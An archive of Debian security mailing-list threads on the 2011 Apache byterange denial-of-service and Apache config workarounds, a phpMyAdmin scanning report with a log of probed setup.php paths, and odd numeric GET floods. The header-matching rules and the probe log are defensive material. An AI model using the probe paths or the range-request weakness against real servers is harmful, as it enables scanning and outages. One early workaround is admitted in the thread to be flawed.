To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/slrnlk87b1.frm.fred...@biggles.jonson.org



Re: Grave apache dos possible through byterange requests

2011-08-28 Thread Thomas Hungenberg
Carlos Alberto Lopez Perez wrote:
> The new advisory [1] recommends this:
> 
>  # Drop the Range header when more than 5 ranges.
>  # CVE-2011-3192
>  SetEnvIf Range (?:,.*?){5,5} bad-range=1
>  RequestHeader unset Range env=bad-range
> 
>  # We always drop Request-Range; as this is a legacy
>  # dating back to MSIE3 and Netscape 2 and 3.
>  RequestHeader unset Request-Range
> 
>  # optional logging.
>  CustomLog /var/log/apache2/range-CVE-2011-3192.log common 
> env=bad-range
>  CustomLog /var/log/apache2/range-CVE-2011-3192.log common 
> env=bad-req-range

What's the use of the second CustomLog line?
'bad-req-range' is never set, is it?

  - Thomas


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/4e5aa494.8030...@demonium.de



Re: Grave apache dos possible through byterange requests

2011-08-26 Thread Carlos Alberto Lopez Perez
On 26/08/11 13:22, linbloke wrote:
> Hello,
> 
> I'm curious as to why you suggest option 2 over option 1 from the Apache
> advisory? My guess is that it is compatible with version 1.3 and 2.x and
> that is has stronger enforcement of the syntax (by requiring ^bytes=)
> rather than just 5 comma separated fields. Would the following be the
> equivalent update to option 1:
> 
> # Drop the Range header when more than 5 ranges.
> # CVE-2011-3192
> SetEnvIf Range (,.*?){5,} bad-range=1
> SetEnvIf Request-Range (,.*?){5,} bad-range=1
> RequestHeader unset Range env=bad-range
> RequestHeader unset Request-Range env=bad-range
> 
> # optional logging.
> CustomLog /var/log/apache2/range-CVE-2011-3192.log common env=bad-range
> 
> I've put that into /etc/apaches/conf.d/CVE-2011-3192
> 
> I appreciate that it clobbers both headers if either match but that's ok
> for me. If either match I'd be happier to drop the connection but I
> don't want to touch every virtualhost config and Rewrite rules scare me
> too.
> 
> 
> Best regards,
> LB

Didn't know the method 1 can be applied outside the vhost, so this is much 
easier to deploy.

Thanks for the tip!


The new advisory [1] recommends this:

 # Drop the Range header when more than 5 ranges.
 # CVE-2011-3192
 SetEnvIf Range (?:,.*?){5,5} bad-range=1
 RequestHeader unset Range env=bad-range

 # We always drop Request-Range; as this is a legacy
 # dating back to MSIE3 and Netscape 2 and 3.
 RequestHeader unset Request-Range

 # optional logging.
 CustomLog /var/log/apache2/range-CVE-2011-3192.log common env=bad-range
 CustomLog /var/log/apache2/range-CVE-2011-3192.log common 
env=bad-req-range


[1] http://lists.grok.org.uk/pipermail/full-disclosure/2011-August/082427.html



signature.asc
Description: OpenPGP digital signature


Re: Grave apache dos possible through byterange requests

2011-08-26 Thread Dirk-Willem van Gulik

On 26 aug. 2011, at 13:22, linbloke wrote:

> I'm curious as to why you suggest option 2 over option 1 from the Apache 
> advisory? My guess is that it is compatible with version 1.3 and 2.x and that 
> is has stronger enforcement of the syntax (by requiring ^bytes=) rather than 
> just 5 comma separated fields. 
...
> RequestHeader unset Range env=bad-range

Correct; env=bad-range is not functional until midway the 2.x (2.2) series.

> I don't want to touch every virtualhost config and Rewrite rules scare me too.

A rewrite rule requires more care - as it may get negated deeper down. 
RequestHeader and SetEnvIf are more robust.

Dw.

--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/1567de1a-b6b5-4fb2-ae56-73c760793...@webweaving.org



Re: Grave apache dos possible through byterange requests

2011-08-26 Thread linbloke


On 26/08/11 8:52 PM, Carlos Alberto Lopez Perez wrote:

On 26/08/11 11:17, Christian Hammers wrote:

Hallo

Word is spreading that "Request-Range:" seems to be a synonym to "Range:" and
is similar vulnerable but not covered by the config snippets that were
proposed yesterday. So Gentlemen, patch again! :-(


Confirmed!.

Just modified the suggest solution[1] adding an [OR] (and nocase) for
also matching for request-range


RewriteEngine on
RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$) [NC,OR]
RewriteCond %{HTTP:request-range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$) [NC]
RewriteRule .* - [F]


[1] https://lwn.net/Articles/456268/


Hello,

I'm curious as to why you suggest option 2 over option 1 from the Apache 
advisory? My guess is that it is compatible with version 1.3 and 2.x and 
that is has stronger enforcement of the syntax (by requiring ^bytes=) 
rather than just 5 comma separated fields. Would the following be the 
equivalent update to option 1:


# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (,.*?){5,} bad-range=1
SetEnvIf Request-Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range
RequestHeader unset Request-Range env=bad-range

# optional logging.
CustomLog /var/log/apache2/range-CVE-2011-3192.log common env=bad-range

I've put that into /etc/apaches/conf.d/CVE-2011-3192

I appreciate that it clobbers both headers if either match but that's ok 
for me. If either match I'd be happier to drop the connection but I 
don't want to touch every virtualhost config and Rewrite rules scare me too.



Best regards,
LB


--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/4e5781f4.1030...@fastmail.fm



Re: Grave apache dos possible through byterange requests

2011-08-26 Thread Carlos Alberto Lopez Perez
On 26/08/11 11:17, Christian Hammers wrote:
> Hallo
> 
> Word is spreading that "Request-Range:" seems to be a synonym to "Range:" and
> is similar vulnerable but not covered by the config snippets that were
> proposed yesterday. So Gentlemen, patch again! :-(
> 
Confirmed!.

Just modified the suggest solution[1] adding an [OR] (and nocase) for
also matching for request-range


RewriteEngine on
RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$) [NC,OR]
RewriteCond %{HTTP:request-range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$) [NC]
RewriteRule .* - [F]


[1] https://lwn.net/Articles/456268/



signature.asc
Description: OpenPGP digital signature


Re: Grave apache dos possible through byterange requests

2011-08-26 Thread Christian Hammers
Hallo

Word is spreading that "Request-Range:" seems to be a synonym to "Range:" and
is similar vulnerable but not covered by the config snippets that were
proposed yesterday. So Gentlemen, patch again! :-(

tschüss,

-christian-


--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20110826111700.64bfc...@sys-251.netcologne.de



Re: Grave apache dos possible through byterange requests

2011-08-25 Thread Rolf Kutz

On 24/08/11 08:53 +0200, Dirk Hartmann wrote:


it is possible to dos a actual squeeze-apache2 with easy to forge
rage-requests:

http://lists.grok.org.uk/pipermail/full-disclosure/2011-August/082299.html

Apache-devs are working on a solution:

http://www.gossamer-threads.com/lists/apache/dev/401638

But because the situation seems serious I thought I give you a heads up.

Running this script against a squeeze machine with 8 Cores and 24GB Ram you
only need 200 threads to kick it out of memory.


There is an advisory that recommends some
workarounds, depending on the needs of your
specific site:

http://mail-archives.apache.org/mod_mbox/httpd-announce/201108.mbox/%3c20110824161640.122d38...@minotaur.apache.org%3E

regards
Rolf

--
I never let my schooling get in the way of my education. — Mark Twain


--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20110825080837.gc13...@vzsze.de



Re: Grave apache dos possible through byterange requests

2011-08-24 Thread Carlos Alberto Lopez Perez
On 24/08/11 14:12, Andrew McGlashan wrote:
> 
> Would that work for all websites of a Debian server if placed into a
> file located in /etc/apache2/conf.d  ?
> 
> Will other rewrites will be fine in the normal conf files for each website?
> 
> Thanks
It should not mess with another redirects that you have.. but I think
that you must apply it under each one of the virtual hosts of your
deployment.



signature.asc
Description: OpenPGP digital signature


Re: Grave apache dos possible through byterange requests

2011-08-24 Thread Carlos Alberto Lopez Perez
On 24/08/11 12:13, Carlos Alberto Lopez Perez wrote:
> You can use the following redirect as a temporally workaround:
> 
> # a2enmod rewrite
> 
> RewriteEngine On
> RewriteCond %{HTTP:Range} bytes=0-.* [NC]
> RewriteRule .? http://%{SERVER_NAME}/ [R=302,L]
> 

Sorry, the above redirect is wrong. It won't work if the attacker
changes bytes=0 to bytes=1 for example in the perl exploit. Also it only
blocks the check that the exploit uses to see if the server is
vulnerable, but not the range requests that is where the real problem is.


Please use the following one instead (suggested at full-disclosure[1]):


RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^(HEAD|GET) [NC]
RewriteCond %{HTTP:Range} ([0-9]*-[0-9]*)(\s*,\s*[0-9]*-[0-9]*)+
RewriteRule .* - [F]



[1]
http://lists.grok.org.uk/pipermail/full-disclosure/2011-August/082365.html



signature.asc
Description: OpenPGP digital signature


Re: Grave apache dos possible through byterange requests

2011-08-24 Thread Andrew McGlashan

Hi,

Carlos Alberto Lopez Perez wrote:

You can use the following redirect as a temporally workaround:

# a2enmod rewrite

RewriteEngine On
RewriteCond %{HTTP:Range} bytes=0-.* [NC]
RewriteRule .? http://%{SERVER_NAME}/ [R=302,L]


Would that work for all websites of a Debian server if placed into a 
file located in /etc/apache2/conf.d  ?


Will other rewrites will be fine in the normal conf files for each website?

Thanks

--
Kind Regards
AndrewM

Andrew McGlashan
Broadband Solutions now including VoIP


--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/4e54eaa3.4080...@affinityvision.com.au



Re: Grave apache dos possible through byterange requests

2011-08-24 Thread Carlos Alberto Lopez Perez
On 24/08/11 12:45, Andrea Zwirner wrote:
> 2011/8/24 Carlos Alberto Lopez Perez 
> 
>> On 24/08/11 08:53, Dirk Hartmann wrote:
>>> Hi,
>>>
>>> it is possible to dos a actual squeeze-apache2 with easy to forge
>>> rage-requests:
>>>
>>>
>> http://lists.grok.org.uk/pipermail/full-disclosure/2011-August/082299.html
>>>
>>> Apache-devs are working on a solution:
>>>
>>> http://www.gossamer-threads.com/lists/apache/dev/401638
>>>
>>> But because the situation seems serious I thought I give you a heads up.
>>>
>>> Running this script against a squeeze machine with 8 Cores and 24GB Ram
>> you
>>> only need 200 threads to kick it out of memory.
>>>
>>> Cheers
>>> Dirk
>>>
>>
>> You can use the following redirect as a temporally workaround:
>>
>> # a2enmod rewrite
>>
>> RewriteEngine On
>> RewriteCond %{HTTP:Range} bytes=0-.* [NC]
>> RewriteRule .? http://%{SERVER_NAME}/ [R=302,L]
>>
>>
> I'm not an Apache expert, could you please explain in broad terms what does
> the workaround does?
> 

It searches case insensitive (NC=nocase) in the http request for a
header of type range like the one used in the exploit:

Range: bytes=0-*

And if the http request matchs the condition then it redirects the user
to the mainpage of your server using a temporally redirect (R=302). Also
it stops processing more rules at this point (L=last).

I tested it thoroughly and it stops the attack meanwhile it don't
affects normal behaviour of the server, resuming downloads continue to
work as expected.

http://stackoverflow.com/questions/3303029/http-range-header




signature.asc
Description: OpenPGP digital signature


Re: Grave apache dos possible through byterange requests

2011-08-24 Thread Andrea Zwirner
2011/8/24 Carlos Alberto Lopez Perez 

> On 24/08/11 08:53, Dirk Hartmann wrote:
> > Hi,
> >
> > it is possible to dos a actual squeeze-apache2 with easy to forge
> > rage-requests:
> >
> >
> http://lists.grok.org.uk/pipermail/full-disclosure/2011-August/082299.html
> >
> > Apache-devs are working on a solution:
> >
> > http://www.gossamer-threads.com/lists/apache/dev/401638
> >
> > But because the situation seems serious I thought I give you a heads up.
> >
> > Running this script against a squeeze machine with 8 Cores and 24GB Ram
> you
> > only need 200 threads to kick it out of memory.
> >
> > Cheers
> > Dirk
> >
>
> You can use the following redirect as a temporally workaround:
>
> # a2enmod rewrite
>
> RewriteEngine On
> RewriteCond %{HTTP:Range} bytes=0-.* [NC]
> RewriteRule .? http://%{SERVER_NAME}/ [R=302,L]
>
>
I'm not an Apache expert, could you please explain in broad terms what does
the workaround does?

Thanks a lot,

   Andrea



-- 
*Andrea Zwirner*
*email:* and...@linkspirit.org
*cell:* +39 366 1872016

*Linkspirit Sistemi Informatici*
*Applicazioni raffinate della scienza informatica*
Via Delle Industrie 5 - 33050 Ronchis UD
*tel:* +39 0432 1845030 - *fax:* +39 0432 309903
*web:* www.linkspirit.it - *email:* i...@linkspirit.it


Re: Grave apache dos possible through byterange requests

2011-08-24 Thread Carlos Alberto Lopez Perez
On 24/08/11 08:53, Dirk Hartmann wrote:
> Hi,
> 
> it is possible to dos a actual squeeze-apache2 with easy to forge
> rage-requests:
> 
> http://lists.grok.org.uk/pipermail/full-disclosure/2011-August/082299.html
> 
> Apache-devs are working on a solution:
> 
> http://www.gossamer-threads.com/lists/apache/dev/401638
> 
> But because the situation seems serious I thought I give you a heads up.
> 
> Running this script against a squeeze machine with 8 Cores and 24GB Ram you
> only need 200 threads to kick it out of memory.
> 
> Cheers
> Dirk
> 

You can use the following redirect as a temporally workaround:

# a2enmod rewrite

RewriteEngine On
RewriteCond %{HTTP:Range} bytes=0-.* [NC]
RewriteRule .? http://%{SERVER_NAME}/ [R=302,L]



signature.asc
Description: OpenPGP digital signature


Grave apache dos possible through byterange requests

2011-08-23 Thread Dirk Hartmann
Hi,

it is possible to dos a actual squeeze-apache2 with easy to forge
rage-requests:

http://lists.grok.org.uk/pipermail/full-disclosure/2011-August/082299.html

Apache-devs are working on a solution:

http://www.gossamer-threads.com/lists/apache/dev/401638

But because the situation seems serious I thought I give you a heads up.

Running this script against a squeeze machine with 8 Cores and 24GB Ram you
only need 200 threads to kick it out of memory.

Cheers
Dirk


Re: scans in my hosts. (Debian 5.0 and Apache 2.2.9)

2010-07-30 Thread Jonas Andradas
On Thu, Jul 29, 2010 at 16:49, Sjors Gielen  wrote:

>
> Op 29 jul 2010, om 16:34 heeft OLCESE, Marcelo Oscar. het volgende
> geschreven:
>
> > Estimated:
> > I am taking these scans in my hosts. (Debian 5.0 and Apache 2.2.9)
> > This has been repeating since a  weeks.
> > Know what can be? What can I do to eliminate?
> >
> > Thanks.
> >
> > Marcelo Olcese.
>
> Someone is scanning your system for vulnerable PHPMyAdmin installations,
> and other possibly vulnerable stuff. As long as you watch your PHPMyAdmin
> installations if you have any and make sure nobody can abuse them, nothing's
> wrong. Try, for example, requiring http authentication to access the
> directories, or turning off your webserver if you didn't need it anyway.
>
> Sjors


Hello,

another option you could try is using package "fail2ban", and setting a
threshold of several 404 errors and/or several 401 errors from a same IP.
When this number of requests is seen, it creates a dynamic iptables rule
that filters out traffic from that IP for a specified amount of time
(configurable).

Best Regards,

-- 
Jonás Andradas

Skype: jontux
LinkedIn: http://www.linkedin.com/in/andradas
GPG Fingerprint:  678F 7BD0 83C3 28CE 9E8F
   3F7F 4D87 9996 E0C6 9372
Keyservers:  pgp.mit.edu | pgp.rediris.es


Re: scans in my hosts. (Debian 5.0 and Apache 2.2.9)

2010-07-29 Thread Jordon Bedwell

On 7/29/10 11:43 AM, Ashley Taylor wrote:

If your phpMyAdmin installations are safe and protected and you wish to
remove these from your log files for vanity reasons, please see this guide
with a cool fail2ban config that should help you:
http://foosel.org/blog/2008/04/banning_phpmyadmin_bots_using_fail2ban

Ash.

On Thu, Jul 29, 2010 at 3:49 PM, Sjors Gielenwrote:



Op 29 jul 2010, om 16:34 heeft OLCESE, Marcelo Oscar. het volgende
geschreven:


Estimated:
I am taking these scans in my hosts. (Debian 5.0 and Apache 2.2.9)
This has been repeating since a  weeks.
Know what can be? What can I do to eliminate?

Thanks.

Marcelo Olcese.


Someone is scanning your system for vulnerable PHPMyAdmin installations,
and other possibly vulnerable stuff. As long as you watch your PHPMyAdmin
installations if you have any and make sure nobody can abuse them, nothing's
wrong. Try, for example, requiring http authentication to access the
directories, or turning off your webserver if you didn't need it anyway.

Sjors




There was a recent influx of attacks on some hosts who were using 
outdated versions [some by almost 4 revisions ~ one host I know of is 
using a version of PHPMyAdmin with about 20 CVE's against it that I 
confirmed myself ~ they have yet to push their "security experts" to 
update this as an emergency or close the loop by creating a prompted 
login ~ some who were very high end hosts] and they were open so a lot 
of people might see this happening more and more.



--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/4c51b444.7060...@envygeeks.com



Re: scans in my hosts. (Debian 5.0 and Apache 2.2.9)

2010-07-29 Thread Ashley Taylor
If your phpMyAdmin installations are safe and protected and you wish to
remove these from your log files for vanity reasons, please see this guide
with a cool fail2ban config that should help you:
http://foosel.org/blog/2008/04/banning_phpmyadmin_bots_using_fail2ban

Ash.

On Thu, Jul 29, 2010 at 3:49 PM, Sjors Gielen wrote:

>
> Op 29 jul 2010, om 16:34 heeft OLCESE, Marcelo Oscar. het volgende
> geschreven:
>
> > Estimated:
> > I am taking these scans in my hosts. (Debian 5.0 and Apache 2.2.9)
> > This has been repeating since a  weeks.
> > Know what can be? What can I do to eliminate?
> >
> > Thanks.
> >
> > Marcelo Olcese.
>
> Someone is scanning your system for vulnerable PHPMyAdmin installations,
> and other possibly vulnerable stuff. As long as you watch your PHPMyAdmin
> installations if you have any and make sure nobody can abuse them, nothing's
> wrong. Try, for example, requiring http authentication to access the
> directories, or turning off your webserver if you didn't need it anyway.
>
> Sjors


Re: scans in my hosts. (Debian 5.0 and Apache 2.2.9)

2010-07-29 Thread Sjors Gielen

Op 29 jul 2010, om 16:34 heeft OLCESE, Marcelo Oscar. het volgende geschreven:

> Estimated:
> I am taking these scans in my hosts. (Debian 5.0 and Apache 2.2.9)
> This has been repeating since a  weeks.
> Know what can be? What can I do to eliminate?
> 
> Thanks.
> 
> Marcelo Olcese.

Someone is scanning your system for vulnerable PHPMyAdmin installations, and 
other possibly vulnerable stuff. As long as you watch your PHPMyAdmin 
installations if you have any and make sure nobody can abuse them, nothing's 
wrong. Try, for example, requiring http authentication to access the 
directories, or turning off your webserver if you didn't need it anyway.

Sjors

smime.p7s
Description: S/MIME cryptographic signature


scans in my hosts. (Debian 5.0 and Apache 2.2.9)

2010-07-29 Thread OLCESE, Marcelo Oscar.

Estimated:
I am taking these scans in my hosts. (Debian 5.0 and Apache 2.2.9)
This has been repeating since a  weeks.
Know what can be? What can I do to eliminate?

Thanks.

Marcelo Olcese.

### Logwatch 7.3.6+cvs20080702-debian (07/02/08) 


   Processing Initiated: Thu Jul 29 06:25:15 2010
   Date Range Processed: yesterday
 ( 2010-Jul-28 )
 Period is day.
   Detail Level of Output: 0
   Type of Output/Format: mail / text
   Logfiles for Host: ancal4
 ##

- httpd Begin  


Requests with error response codes
   401 Unauthorized
  /htm/oculto/frame9.htm: 3 Time(s)
  /phpmyadmin/scripts/setup.php: 1 Time(s)
   404 Not Found
  /PMA/scripts/setup.php: 1 Time(s)
  /PMA2005/scripts/setup.php: 1 Time(s)
  /_vti_bin/_vti_aut/author.dll: 1 Time(s)
  /admin/mysql/scripts/setup.php: 1 Time(s)
  /admin/phpmyadmin/scripts/setup.php: 1 Time(s)
  /admin/pma/scripts/setup.php: 1 Time(s)
  /admin/scripts/setup.php: 1 Time(s)
  /db/scripts/setup.php: 1 Time(s)
  /dbadmin/scripts/setup.php: 1 Time(s)
  /favicon.ico: 14 Time(s)
  /myadmin/scripts/setup.php: 1 Time(s)
  /mysql-admin/scripts/setup.php: 1 Time(s)
  /mysql/scripts/setup.php: 1 Time(s)
  /mysqladmin/scripts/setup.php: 1 Time(s)
  /mysqlmanager/scripts/setup.php: 1 Time(s)
  /nosuichfile.php: 1 Time(s)
  /noxdir/nosuichfile.php: 1 Time(s)
  /p/m/a/scripts/setup.php: 1 Time(s)
  /pHpMy/scripts/setup.php: 1 Time(s)
  /pHpMyAdMiN/scripts/setup.php: 1 Time(s)
  /php-my-admin/scripts/setup.php: 1 Time(s)
  /php-myadmin/scripts/setup.php: 1 Time(s)
  /phpMyA/scripts/setup.php: 1 Time(s)
  /phpMyAdmi/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.10.0/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.11.1/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.11.10/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.11.2/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.11.3/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.11.4/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.11.5/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.11.6/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.11.7/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.11.8/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.11.9/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.2.3/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.2.6/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.3.0/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.3.1/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.3.2/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.3.3/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.3.4/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.3.5/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.3.6/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.3.7/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.3.8/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.3.9/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.4.0/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.4.1/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.4.2/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.4.3/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.4.4/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.4.5/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.4.6/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.4.7/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.4.8/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.4.9/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.5.0/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.5.1/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.5.2/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.5.3/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.5.4/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.5.5-pl1/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.5.5-rc1/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.5.5-rc2/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.5.5/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.5.6-rc1/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.5.6-rc2/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.5.6/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.5.7-pl1/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.5.7/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.5.8/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.5.9/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.6.0-alpha/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.6.0-alpha2/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.6.0-beta1/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.6.0-beta2/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.6.0-pl1/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.6.0-pl2/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.6.0-pl3/scripts/setup.php: 1 Time(s)
  /phpMyAdmin-2.6.0-rc1/scripts

Re: [SECURITY] [DSA 1834-2] New apache/apache2-mpm-itk fix regression

2009-07-30 Thread Grant Kwok
I am away from the office until Aug 4, 2009.  If this is an emergency, please 
contact Philip Young at pjyo...@dowco.com.

Thanks.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org



Re: New apache/apache2-mpm-itk fix regression

2009-07-30 Thread joseluis . hernandez
Estoy de vacaciones hasta el 20 de Agosto. Leeré tu correo cuando vuelva. Si 
deseas algo urgente, contacta con

siste...@listserv.uc3m.es.



--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org



Re: [SECURITY] [DSA 1834-2] New apache/apache2-mpm-itk fix regression

2009-07-30 Thread luc . santeramo
Bonjour,
Je suis absent du 31/07/09 au 17/08/09. En cas de nécessité, merci de contacter Semantia par e-mail à l'adresse supp...@semantia.com ou par téléphone au 04 42 36 80 91.
Cordialement,
--

Luc Santeramo - Responsable systèmes et sécurité


Semantia


Tél. : 04 42 36 80 91 - e-mail : luc.santer...@semantia.com



Agence Paris :
3, rue Troyon - 75017 Paris
Tél. : 01 40 55 46 01 - Fax : 01 42 67 93 09
Siège :
Les Espaces de la Sainte-Baume - 30, Avenue du Château de Jouques -
13420 Gémenos
Tél. : 04 42 36 80 91 - Fax : 04 42 36 81 59

i...@semantia.com - www.semantia.com




-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org



Re: mod_security (was: Apache "DDOS" with random number request)

2008-09-22 Thread Alberto Gonzalez Iniesta
On Mon, Sep 22, 2008 at 08:16:01AM +0200, Stefan Fritsch wrote:
> On Monday 22 September 2008, Felipe Figueiredo wrote:
> > > Try modsecurity, it should block invalid URI
> >
> > Speaking of which, shouldn't it be re-included in Debian now that
> > the licensing issue[1] is supposed to be over[2]?
> 
> There is already an ITP bug, but I don't know the current status.
> 
> http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=487431
> 
> 

Coming soon (tm)


-- 
Alberto Gonzalez Iniesta| Formación, consultoría y soporte técnico
agi@(inittab.org|debian.org)| en GNU/Linux y software libre
Encrypted mail preferred| http://inittab.com

Key fingerprint = 9782 04E7 2B75 405C F5E9  0C81 C514 AF8E 4BA4 01C3


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



mod_security (was: Apache "DDOS" with random number request)

2008-09-21 Thread Stefan Fritsch
On Monday 22 September 2008, Felipe Figueiredo wrote:
> > Try modsecurity, it should block invalid URI
>
> Speaking of which, shouldn't it be re-included in Debian now that
> the licensing issue[1] is supposed to be over[2]?

There is already an ITP bug, but I don't know the current status.

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=487431


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Apache "DDOS" with random number request

2008-09-21 Thread Felipe Figueiredo
On Mon, 2008-09-22 at 09:15 +1000, Stephen Vaughan wrote:
> Try modsecurity, it should block invalid URI
> 


Speaking of which, shouldn't it be re-included in Debian now that the
licensing issue[1] is supposed to be over[2]?

1. http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=352344
2. http://blog.modsecurity.org/2008/06/modsecurity-lic.html

regards
FF


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Apache "DDOS" with random number request

2008-09-21 Thread Michael Loftis
It sounds liek your app, or a combination of the modules you're using is 
more likely what's running Apache out of memory.  mod_security could be 
used to check for requests that contain just a numeric path to GET, but I'd 
investigate why your app/configuration is causing an OOM error.  Could it 
be you've got MaxClients set too high and the clients are holding 
connections open after the fact?


There are many possibilities at this point, many of which (most) have 
nothing to do with apache but with local configuration and options.


--On September 22, 2008 12:08:39 AM +0200 NeMiX <[EMAIL PROTECTED]> wrote:




Hi there,



since last week we´ve got a little problem with our Webserverfarm.

We get some strange Request from some Dial-Up Accounts from Europe
(T-Online; Telefonica; Orange...):



Sep 21 22:47:35 logger: [Sun Sep 21 22:47:35 2008] [error] [client
87.183.65.xx] Invalid URI in request GET 347905 HTTP/1.0 Sep 21 22:47:35
logger: [Sun Sep 21 22:47:35 2008] [error] [client 87.183.65.xx] Invalid
URI in request GET 341922 HTTP/1.0



This strange Request (GET 347905 HTTP/1.0 ) pass our Firewall (because
it´s normal HTTP), goes to our Load balancer and then to our Webserver.



Only 1 Client make about 80-100 strange Request per Minute and we get a
peak on our Webserverfarm and finally after 5 Minutes the Webserver(s)
get out of memory:



Out of Memory: Kill process 12082 (apache) score 199722 and children.

Out of memory: Killed process 19435 (apache).



If we get a "DDOS" we make a tcpdump and count the IPs (maximum 8 Dial Up
Accounts) to block them on our Firewall.



I don´t find any about this strange request on Google or some security
boards.



Is this a new kind of DDOS or just kiddy stuff? If someone have some more
information about this strange Request/DDOS it would be very nice if he
can send this to me.



Kind Regards



--

Andre Braun, IT Manager



Turtle Entertainment GmbH












--
Michael Loftis
Modwest Operations Manager
Powerful, Affordable Web Hosting


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Apache "DDOS" with random number request

2008-09-21 Thread Stephen Vaughan
Try modsecurity, it should block invalid URI

On Mon, Sep 22, 2008 at 8:08 AM, NeMiX <[EMAIL PROTECTED]> wrote:

>  Hi there,
>
>
>
> since last week we´ve got a little problem with our Webserverfarm.
>
